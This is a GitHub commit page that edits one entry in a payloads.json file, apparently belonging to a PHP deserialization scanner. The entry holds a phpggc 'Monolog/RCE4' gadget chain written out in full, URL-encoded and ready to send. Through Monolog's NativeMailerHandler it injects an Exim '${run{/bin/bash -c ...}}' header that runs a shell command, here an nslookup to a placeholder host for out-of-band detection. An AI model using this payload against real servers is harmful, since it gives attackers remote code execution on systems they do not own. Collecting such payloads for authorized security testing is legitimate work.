Skip to content

Commit

Permalink
Fix Monolog RC4 payload
Browse files Browse the repository at this point in the history
  • Loading branch information
Ricardo Almeida committed May 8, 2021
1 parent 16c76c4 commit 9b5f199
Showing 1 changed file with 2 additions and 2 deletions.
4 changes: 2 additions & 2 deletions res/payloads.json
Original file line number Diff line number Diff line change
Expand Up @@ -86,8 +86,8 @@
{
"_needs_dynamic_payload_editing": false,
"name": "Monolog ? <= 2.4.4+",
"gen_with": "./phpggc Monolog/RCE4 <function> <parameter>",
"payload": "O:30:\"Monolog\\Handler\\RollbarHandler\":2:{s:42:\"%00Monolog\\Handler\\RollbarHandler%00hasRecords\"%3Bb:1%3Bs:16:\"%00*%00rollbarLogger\"%3BO:29:\"Monolog\\Handler\\BufferHandler\":3:{s:13:\"%00*%00bufferSize\"%3Bi:2%3Bs:10:\"%00*%00handler\"%3BO:35:\"Monolog\\Handler\\NativeMailerHandler\":7:{s:8:\"%00*%00level\"%3Bi:1%3Bs:13:\"%00*%00processors\"%3Ba:1:{i:0%3Bs:13:\"array_reverse\"%3B}s:12:\"%00*%00formatter\"%3BO:31:\"Monolog\\Formatter\\LineFormatter\":1:{s:9:\"%00*%00format\"%3Bs:0:\"\"%3B}s:17:\"%00*%00maxColumnWidth\"%3Bi:20%3Bs:13:\"%00*%00parameters\"%3Ba:1:{i:0%3Bs:3:\"-be\"%3B}s:5:\"%00*%00to\"%3Ba:1:{i:0%3Bs:14:\"init@localhost\"%3B}s:10:\"%00*%00headers\"%3Ba:1:{i:0%3Bs:115:\"${run{/bin/bash -c \"nslookup CHANGEME?1620384651\"}{yes}{no}}\"%3B}}s:9:\"%00*%00buffer\"%3Ba:1:{i:0%3Ba:5:{s:5:\"level\"%3Bi:100%3Bs:7:\"message\"%3Bi:1%3Bs:7:\"context\"%3Ba:0:{}s:5:\"extra\"%3Ba:0:{}s:7:\"channel\"%3Bi:1%3B}}}}"
"gen_with": "./phpggc Monolog/RCE4 <command>",
"payload": "O:30:\"Monolog\\Handler\\RollbarHandler\":2:{s:42:\"%00Monolog\\Handler\\RollbarHandler%00hasRecords\"%3Bb:1%3Bs:16:\"%00*%00rollbarLogger\"%3BO:29:\"Monolog\\Handler\\BufferHandler\":3:{s:13:\"%00*%00bufferSize\"%3Bi:2%3Bs:10:\"%00*%00handler\"%3BO:35:\"Monolog\\Handler\\NativeMailerHandler\":7:{s:8:\"%00*%00level\"%3Bi:1%3Bs:13:\"%00*%00processors\"%3Ba:1:{i:0%3Bs:13:\"array_reverse\"%3B}s:12:\"%00*%00formatter\"%3BO:31:\"Monolog\\Formatter\\LineFormatter\":1:{s:9:\"%00*%00format\"%3Bs:0:\"\"%3B}s:17:\"%00*%00maxColumnWidth\"%3Bi:20%3Bs:13:\"%00*%00parameters\"%3Ba:1:{i:0%3Bs:3:\"-be\"%3B}s:5:\"%00*%00to\"%3Ba:1:{i:0%3Bs:14:\"init@localhost\"%3B}s:10:\"%00*%00headers\"%3Ba:1:{i:0%3Bs:104:\"${run{/bin/bash -c \"nslookup CHANGEME\"}{yes}{no}}\"%3B}}s:9:\"%00*%00buffer\"%3Ba:1:{i:0%3Ba:5:{s:5:\"level\"%3Bi:100%3Bs:7:\"message\"%3Bi:1%3Bs:7:\"context\"%3Ba:0:{}s:5:\"extra\"%3Ba:0:{}s:7:\"channel\"%3Bi:1%3B}}}}"
},
{
"_needs_dynamic_payload_editing": false,
Expand Down

0 comments on commit 9b5f199

Please sign in to comment.